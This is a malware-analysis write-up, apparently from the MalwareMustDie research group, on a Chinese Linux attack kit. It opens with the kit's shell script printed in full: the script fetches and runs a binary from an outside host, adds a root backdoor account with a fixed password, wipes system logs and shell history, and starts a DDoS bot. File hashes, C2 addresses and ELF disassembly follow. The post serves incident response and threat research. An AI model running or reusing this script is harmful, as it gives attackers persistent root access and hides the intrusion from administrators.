    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/z1d-2011 
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 z1d-2011
        ./z1d-2011
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

cd ..
rm -rf exploits
CNT=''
DLER=''
CURLIT=''

if [ $GOTROOT = 1 ] 2> /dev/null
then
    RUSER='somesecguy'
    RPASS='g0tr00t'
    echo ' [*] Adding r00t user..'
    useradd -g 0 -G root -M -s /bin/bash -p $RPASS $RUSER
    echo
    echo " [*] Added r00t user: $RUSER"
    echo " [*] p455w0rd:  $RPASS"
    echo " [*] Clearing logs.."
    RPASS=''
    RUSER=''
    GOTROOT=''
    rm -rf /tmp/logs 2> /dev/null
    rm -rf /root/.ksh_history 2> /dev/null
    rm -rf /root/.bash_history 2> /dev/null
    rm -rf /root/.bash_logout 2> /dev/null
    rm -rf /usr/local/apache/logs 2> /dev/null
    rm -rf /usr/local/apache/log 2> /dev/null
    rm -rf /var/apache/logs 2> /dev/null
    rm -rf /var/apache/log 2> /dev/null
    rm -rf /var/run/utmp 2> /dev/null
    rm -rf /var/logs 2> /dev/null
    rm -rf /var/log 2> /dev/null
    rm -rf /var/adm 2> /dev/null
    rm -rf /etc/wtmp 2> /dev/null
    rm -rf /etc/utmp 2> /dev/null
    echo " [*] You g0tr00t, horray for you..."
killall -9 .profild.key
./profild.key &
    whoami
    id
else
    echo " [*] You didn't g0tr00t, sucks to be you..."
    whoami
    id
fi

After trying all these Kernel Exploits and getting a successful return, it will put it’s own (blatantly obvious) user on the system, add it to the root group, and give it a login shell.

It will then run its CnC Connector (Which MMD has a full analysis of below) and await further orders.

Now we pull apart some ELF binaries.

Here’s where my main man MalwareMustDie comes in, Most of these things it pulls down are ELF Binaries. MMD is the master of these, so I’ll leave those to him. I’ll be posting a few of his analysis runs on this post, but this will be a two parter.

Most of these seem to be various Kernel exploits to escalate privileges, but we got some other binaries too, MMD will be looking at these.

I’ll slowly be going through the scripts and other text-based files here and will tie them into MalwareMustDie’s ELF analysis.

Here’s MMD’s initial hash’n’file run on all the lovely toys we found:

// #MalwareMustDie China ELF factory Case PM: @yinettesys 
// root directory of http://61.147.103.21:8080/ (116 files)
// date: Tue Sep  2 19:49:44 JST 2014
// pic snapshot: https://lh6.googleusercontent.com/-9rJWeo2uEOE/VAWh2D3QnUI/AAAAAAAAQxc/tLOTAb-Pg3g/s2176/000.png

10:                          ca36d1dea2e237e34b2886028eace6e9  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
11:                          71798c31da9ebe7de0ae1046a338542c  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.16, not stripped
2-1:                         cc29a224e327412e0db7f3ce5c4f4e00  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
2-6-32-46-2011:              d0b9d58f3a454ad6df2e4d055858c1e5  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
2-6-37:                      0a656c6bc7eeabb467f6fa38ed57200b  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
2-6-9-2005:                  9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2-6-9-2006:                  9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.18-2011:                 a85d3f342ee981acd04ae01ecac90ce7  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x55603d8a443448ac0441b9826cb6ed2c9ca90c6a, not stripped
2.6.18-274-2011:             c599953283142f81e3dd00786ae5e339  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.18-374.12.1.el5-2012:    d28ad04b3d7ec12180aa0facde4a15d1  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.18-6-x86-2011:           f8f978474b8a0e3cd29c0ce2f1e2ce24  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=0xfadaca3ae23a563d41ab6b8ed8970e5c5bcadba3, not stripped
2.6.2-hoolyshit:             b41de74bfebb25385495b00f55f86d7b  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.20:                      b281ec632e9a1abf0512e6fb47a2b22d  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xbd01b2a57403681bb9e0b4430813c8ae24e7d437, not stripped
2.6.20-2:                    ecad97fd2f81edbdc64b464f5f41d615  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.22:                      7388c7836cfdf444d458ef71e14f3764  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.22-2008:                 7388c7836cfdf444d458ef71e14f3764  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.22-6-86_64-2007:         d42aff3eca031685a080401611980b68  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.23-2.6.24:               9016a062e7ca5da081c9e1fc7ec8a9d9  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.23-2.6.24_2:             07e6dc1d47bdd39f421456d9113410b7  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xe824f6f9d73ecf40e98bbcf03c5527b53a3e7f57, not stripped
2.6.23-2.6.27:               6dac57e2ed1c530373f5957620e3343a  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x0c1099606760b6d744fc70cf706022812004336f, not stripped
2.6.24:                      9016a062e7ca5da081c9e1fc7ec8a9d9  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.27.7-generi:             ed675f7cc64e171c13e8c1a48f59b050  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x9534017032ab79e62c33d3bbeac761a8909bfb62, not stripped
2.6.28-2011:                 32b3b21b03e2b3799012345a62e93bc7  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.32-46.1.BHsmp:           f2b00b27e6e8d10d3c27525ecd9af120  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.33:                      b3522ca1a328325a5eefba65eb8e75f3  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.33-2011:                 9332cf422fe610a3b992cc552c8dc329  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.34-2011:                 fb5f74894c583b21b7344c00847780ba  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
2.6.34-2011Exploit1:         1bc06341c684ee272b4b9dea21271818  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x783520ba58ba9a28710dbd45c33e7e91206f0f72, not stripped
2.6.34-2011Exploit2:         d723b2f9336a3c355fabe19af64f8191  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x63d51edaa09792f97739bc6bbc7f559033d2e1ba, not stripped
2.6.37:                      b4707633389d19d744c70bc174da2465  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.37-rc2:                  8043418c198c5ed597825c3fe8c93a20  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.5_hoolyshit:             3548a183765cec72bcc83ceaedbda8ce  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.6-34:                    eecd5209ab453cad03e700dd8dcb14e7  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x713bcde64c81e264bf6beb6e71a2320297203a9c, not stripped
2.6.6-34_h00lyshit:          716a1572c17feea66cbe0f5b5fbcb99a  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8d2704030a3ae325f7391a66dceffec4701f0e3a, not stripped
2.6.6_h00lyshit:             3a96db22d6fafc8fdb0629b5b02db7db  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.7_h00lyshit:             88fbdc17a050f5a0e61d020bbb8790c2  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.8-2008.9-67-2008:        9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.8-5_h00lyshit:           e01b59c242f92bf080cafe91d4c4b544  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x306ea825a585ec53602136866f4a8419c7140c9f, not stripped
2.6.8_h00lyshit:             155edeb351f0bf3bc1148f1c5b8a72cb  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.9:                       9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-2004:                  227f80f70a3df0221bbc15183be99a29  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xaa828623ffd092a03a7c6b2bf5b2de116d14a7ef, not stripped
2.6.9-2008:                  9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-34:                    0f59088fcc5f747b4eed7ce154070184  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x5ba63f88727116280f03f21195c698e2d50e694c, not stripped
2.6.9-42.0.3.ELsmp:          9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-42.0.3.ELsmp-2006:     9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-55:                    898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.9-55-2007-prv8:          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.9-55-2008-prv8:          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.9-672008:                9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9.2:                     9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.91-2007:                 898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2007:                        cf6c56ba83b118b59339fd973facc936  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2009-local:                  f632f166ba1b2d4c1dbfd3c3a6ae8f60  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xeff15dc54da4d86655f33396d9999a15f414c039, not stripped
2009-wunderbar:              efdab2a48ee969e9e5d92f5642f7a37d  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xfbf6f992609d6aaea4cabfe67ce3d29729ad9e6b, not stripped
2011:                        bf068e7234b88bdc5176e25020aec704  HTML document, ASCII text, with no line terminators
21:                          a22718f906df6efa9bbf85b62fd31e98  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
3:                           17260fd703b1a28bc9899c7a8e008ecb  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.8, not stripped
3.4.6-9-2007:                cf6c56ba83b118b59339fd973facc936  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
31:                          d38392c7fe801b017ec2374cf1a41ba4  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), corrupted program header size, corrupted section header size
314_amd64:                   4ae7bb3fdd984c36c1d54699eda83983  ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=0x0515130a8eb26a6d6146ef8d927fcc9418ed3567, not stripped
314_arm32:                   9810036e5bf9c6cb673e78ae61d90cca  ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, for GNU/Linux 2.6.14, not stripped
314_mips:                    cd70bf918ad2c59f0606a8f0ea24ce51  ELF 32-bit MSB executable, MIPS, MIPS32 version 1 (SYSV), statically linked, with unknown capability 0x41000000 = 0xf676e75, with unknown capability 0x10000 = 0x70403, not stripped
36-rc1:                      7f51fb0fb242d52b537923aee9dc86b4  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
4:                           fbe109c8a305326e3d6382931c79ea5a  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), not stripped
44:                          fe14f4015d87e0ba092a1938c210aa32  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
47:                          9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
5:                           bd30baa1366ca35328db8c65743c1cc2  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
50:                          2aa7b2ed3560dc38884c9dad5f3c5b27  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.16, not stripped
54:                          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
6:                           898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
67:                          b65c4db2288501d1c0ba57d8a8a219bf  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
7:                           b5c86d43ca4c4cfb9e7bbecf311b4206  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
7-2:                         13069c09a9e730972aa80facba34f304  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
7x:                          d75e33b06552794cdc4ffacf56ddef68  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
8:                           e6433b5eeae98a0f9c6831cc19261fcd  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
9:                           cf6c56ba83b118b59339fd973facc936  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
90:                          216b4256d0c6fa1aa26e3af2b778be23  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.0, not stripped
94:                          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
L26_TM:                      510450312fd45771782a50975985f0a4  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
Linux_2.6(1).12:             94030d4295d745e5c30fe0e552adc824  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.0, not stripped
Linux_2.6.12:                94030d4295d745e5c30fe0e552adc824  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.0, not stripped
Linux_2.6.9-joolyshit:       9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
Output.map:                  f8997fe0b1856e8526491a3efa2622ce  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
Output.sh:                   7bb57d03b9f572aafe92a53474ab2d06  POSIX shell script, ISO-8859 text executable, with CRLF, LF line terminators
SSHEXA5.5:                   e2d8f680509a8a8151678aa117a9ed82  directory
SSHEXA5.5.zip:               d18d100f4f1709a04d627b67c2bda4ca  Zip archive data, at least v1.0 to extract
acid:                        1191e4317b1db999dddb874358b100d4  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
cc.py:                       a165075fac9d6658063ee1d96adff2af  Python script, ASCII text executable, with CRLF line terminators
client:                      27b14430b00f8ab6a275cfd078a4779f  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=0x9b9c3a61459d5b931b07439d931c2c31400d50fd, not stripped
client_x86.tar.gz:           3ce1c3ca87b50c7c59416a386704eb87  gzip compressed data, from Unix, last modified: Sat Oct 19 18:54:15 2013
d3vil:                       cf6c56ba83b118b59339fd973facc936  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
exp1:                        0ca06667709ffab67e1805213b33bdc2  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
exp2:                        453a82ebc34ca50f3ad523ca84bd1dbc  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
exp3:                        ff8b8b8328cf1854cbdbe9b24d2892fa  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
exploit:                     0d77d3591cd117c26a3a68431e7fd5b6  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked (uses shared libs), stripped
full-nelson:                 b7d880e7180fc8f369576d51db1c1f98  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
gayros:                      e8af947275be0ff322e1e79aefc25773  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
ip.txt:                      ddffbeddcae91136c6b3ab4bed47fb13  ASCII text, with CRLF line terminators
ips.rar:                     cbdc45dc8266c73e20abbbfae0f0caa4  RAR archive data, v1d, os: Win32
keymap22.map:                c948eda49417279d67818d789b0acb78  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.4, not stripped
lenis.sh:                    e05071a638f30e527e54b0452028845f  POSIX shell script, ASCII text executable
local-2.6.9-2005-2006:       9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
local-root-exploit-gayros:   c90359da14a9e5fab6a8b0ca8a5b135e  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
passwd.txt:                  270d77b7abb20a785057aaa53af0d2a1  ASCII text, with CRLF line terminators
priv4:                       caa0bad9e98ce0bb51f4d09858a0b913  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.8, not stripped
profild.key:                 9a2a00f4bba2f3e0b1211a1f0cb48896  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
pwnkernel:                   d6f00b090c4ea1052fc1f4abdd47e72e  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
root.py:                     8a03114a2f269f6413767130bde53403  Python script, ASCII text executable
run.sh:                      8484ddd6282dc0b90d4e903866dc1526  Bourne-Again shell script, ASCII text executable
runx:                        3ae636b32c25cfe12dd0a17a26162722  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
tivoli:                      c02abcfd984f50ed3588e8703f667f6a  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
ubuntu:                      dcdb22eef329ee15bb075ed24dfa9902  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
url:                         8c317f4c9fa83d21e4a6aec63ae61ccf  ASCII text, with CRLF line terminators
vmsplice-local-root-exploit: a83d56cd9f61f6cf20272681d7ff3b91  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
z1d-2011:                    aa5abe2823e405ffce8b55e9145fd251  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
茘鐔域鐔肴㏍誌住鐔区鐔庚zip: d8ece01117f50ada46eeef399fcb7444  Zip archive data, at least v2.0 to extract

---
#MalwareMustDie | IR Handle: MMDD-2014-0026

Full copy here: http://pastebin.com/3psXaj0C

And Here’s MMD’s Binary analysis on one of the ELF binaries that isn’t a Kernel Exploit. Is a standard DDoS Binary that appears to dial home to a CNC:

# MalwareMustDie China ELF DDoSer Analysis
# Comments edited by Yinette
# Sample: 9a2a00f4bba2f3e0b1211a1f0cb48896
# ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
# VT: https://www.virustotal.com/en/file/bb4786695774ae7777200a78e56db83ad5d5bdf1c1b84ef86dd796f7c9a3e1b4/analysis/1409687242/

# Reference1 analysis (x64 base compilation, older version, new dates, CNC: 199.101.117.142)
https://www.virustotal.com/en/file/8fa44a7b3eb707f584b223792bdb78b1e5f69a40dba20634094077c2f0287bca/analysis/1409730903/ 
# Reference2 analysis (same compilation, same CNC IP 61.147.103.21 w/u different port number as CNC)
https://www.virustotal.com/en/file/d2b3ce2195b1422c165faeb1fbbdd098f13df6cf6595fb18f8d618cd78df597c/analysis/1409729124/

# =============================
# Binary Analysis
# =============================

ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2s complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048120
  Start of program headers:          52 (bytes into file)
  Start of section headers:          1199680 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         5
  Size of section headers:           40 (bytes)
  Number of section headers:         28
  Section header string table index: 25

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .note.ABI-tag     NOTE            080480d4 0000d4 000020 00   A  0   0  4
  [ 2] .init             PROGBITS        080480f4 0000f4 000017 00  AX  0   0  4
  [ 3] .text             PROGBITS        08048120 000120 0e3800 00  AX  0   0 32
  [ 4] __libc_freeres_fn PROGBITS        0812b920 0e3920 000f6e 00  AX  0   0  4
  [ 5] __libc_thread_fre PROGBITS        0812c890 0e4890 0000e2 00  AX  0   0  4
  [ 6] .fini             PROGBITS        0812c974 0e4974 00001a 00  AX  0   0  4
  [ 7] .rodata           PROGBITS        0812c9a0 0e49a0 021eee 00   A  0   0 32
  [ 8] __libc_subfreeres PROGBITS        0814e890 106890 00003c 00   A  0   0  4
  [ 9] __libc_atexit     PROGBITS        0814e8cc 1068cc 000004 00   A  0   0  4
  [10] __libc_thread_sub PROGBITS        0814e8d0 1068d0 000004 00   A  0   0  4
  [11] .eh_frame         PROGBITS        0814e8d4 1068d4 016d08 00   A  0   0  4
  [12] .gcc_except_table PROGBITS        081655dc 11d5dc 005049 00   A  0   0  4
  [13] .tdata            PROGBITS        0816b628 122628 000014 00 WAT  0   0  4
  [14] .tbss             NOBITS          0816b63c 12263c 00001c 00 WAT  0   0  4
  [15] .ctors            PROGBITS        0816b63c 12263c 00002c 00  WA  0   0  4
  [16] .dtors            PROGBITS        0816b668 122668 00000c 00  WA  0   0  4
  [17] .jcr              PROGBITS        0816b674 122674 000004 00  WA  0   0  4
  [18] .data.rel.ro      PROGBITS        0816b680 122680 00063c 00  WA  0   0 32
  [19] .got              PROGBITS        0816bcbc 122cbc 00005c 04  WA  0   0  4
  [20] .got.plt          PROGBITS        0816bd18 122d18 00000c 04  WA  0   0  4
  [21] .data             PROGBITS        0816bd40 122d40 001034 00  WA  0   0 32
  [22] .bss              NOBITS          0816cd80 123d74 0091d8 00  WA  0   0 32
  [23] __libc_freeres_pt NOBITS          08175f58 123d74 000020 00  WA  0   0  4
  [24] .comment          PROGBITS        00000000 123d74 000fa5 00      0   0  1
  [25] .shstrtab         STRTAB          00000000 124d19 000126 00      0   0  1
  [26] .symtab           SYMTAB          00000000 1252a0 018110 10     27 1246  4
  [27] .strtab           STRTAB          00000000 13d3b0 03224e 00      0   0  1

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  LOAD           0x000000 0x08048000 0x08048000 0x122625 0x122625 R E 0x1000
  LOAD           0x122628 0x0816b628 0x0816b628 0x0174c 0x0a950 RW  0x1000
  NOTE           0x0000d4 0x080480d4 0x080480d4 0x00020 0x00020 R   0x4
  TLS            0x122628 0x0816b628 0x0816b628 0x00014 0x00030 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

 Section to Segment mapping:
  Segment Sections...
   00     .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
   01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss

Offset 0x000000d4 | len x00000020:
  Owner         Data size       Description
  GNU           0x00000010      NT_VERSION (version)

// Notes:
no dynamic section 
no relocations 
no unwind sections 

# =============================
# Reversing w/debug PoC
# =============================

// first section reversed (for characteristics)
            ;-- section..text:
            0x08048120    31ed         xor ebp, ebp
            0x08048122    5e           pop esi
            0x08048123    89e1         mov ecx, esp
            0x08048125    83e4f0       and esp, 0xfffffff0
            0x08048128    50           push eax
            0x08048129    54           push esp
            0x0804812a    52           push edx
            0x0804812b    68f4c20c08   push sym.__libc_csu_fini ; 0x080cc2f4
            0x08048130    689cc20c08   push sym.__libc_csu_init ; 0x080cc29c
            0x08048135    51           push ecx
